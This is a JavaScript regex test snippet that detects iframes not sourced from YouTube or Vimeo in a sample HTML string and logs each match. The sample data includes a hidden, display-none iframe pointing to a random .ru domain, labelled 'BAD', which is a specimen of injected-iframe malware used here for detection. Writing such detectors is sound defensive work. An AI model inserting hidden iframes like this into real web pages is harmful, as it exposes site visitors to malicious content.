const regex = /(?:<iframe\s((?!src)[^=]*="[^"]*"\s){0,3}src="(?:https|http):\/\/(?!www.youtube.com\/|youtube.com\/|player.vimeo.com\/)[^"]*"[^>]*>.*?<\/iframe>)/gmis;
// Alternative syntax using RegExp constructor
// const regex = new RegExp('(?:<iframe\\s((?!src)[^=]*="[^"]*"\\s){0,3}src="(?:https|http):\\\/\\\/(?!www.youtube.com\\\/|youtube.com\\\/|player.vimeo.com\\\/)[^"]*"[^>]*>.*?<\\\/iframe>)', 'gmis')
const str = `Good:
<p> </p>
<p><iframe width="560" height="315" src="https://www.youtube.com/embed/UYHjyNNy_4Y" frameborder="0" allowfullscreen></iframe></p>
<p>asdasda </p>
Good:
<p> </p>
<p><iframe src="https://player.vimeo.com/video/75781782?badge=0" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe> <p><a href="https://vimeo.com/75781782">Keloid</a> from <a href="https://vimeo.com/biglazyrobot">BLR_VFX</a> on <a href="https://vimeo.com">Vimeo</a>.</p></p>
<p>asdasda </p>
Norm:
<p> </p>
<p><iframe width="560" height="315" src="https://www.1youtube.com/embed/UYHjyNNy_4Y" frameborder="0" allowfullscreen></iframe></p>
<p>asdasda </p>
BAD:
<p> </p>
<p><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe></p>
<p>asdasda </p>
`;
// Reset `lastIndex` if this regex is defined globally
// regex.lastIndex = 0;
let m;
while ((m = regex.exec(str)) !== null) {
// This is necessary to avoid infinite loops with zero-width matches
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
// The result can be accessed through the `m`-variable.
m.forEach((match, groupIndex) => {
console.log(`Found match, group ${groupIndex}: ${match}`);
});
}